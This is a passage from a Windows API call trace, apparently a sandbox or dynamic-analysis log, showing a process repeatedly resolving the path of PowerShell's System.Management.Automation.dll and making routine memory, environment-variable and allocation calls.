lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.035] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.036] GetLastError () returned 0xcb [0147.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.037] GetLastError () returned 0xcb [0147.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.038] GetLastError () returned 0xcb [0147.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.038] GetLastError () returned 0xcb [0147.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.038] GetLastError () returned 0xcb [0147.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.039] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.054] GetLastError () returned 0xcb [0147.054] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.056] GetLastError () returned 0xcb [0147.154] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.169] GetLastError () returned 0xcb [0147.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.170] GetLastError () returned 0xcb [0147.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.172] GetLastError () returned 0xcb [0147.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.177] GetLastError () returned 0xcb [0147.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.183] GetLastError () returned 0xcb [0147.227] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.229] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.469] GetLastError () returned 0xcb [0147.559] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0147.687] GetLastError () returned 0xcb [0148.536] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3ee4a8 [0148.536] GetLastError () returned 0x0 [0148.537] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3ee530 [0148.537] GetLastError () returned 0x0 [0148.750] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.808] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.809] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.810] VirtualQuery (in: lpAddress=0x2dc664, lpBuffer=0x2dd664, dwLength=0x1c | out: lpBuffer=0x2dd664*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.077] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.077] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.077] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.077] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.077] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: lpBuffer=0x2ddfb0*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.078] VirtualQuery (in: lpAddress=0x2dcfb0, lpBuffer=0x2ddfb0, dwLength=0x1c | out: 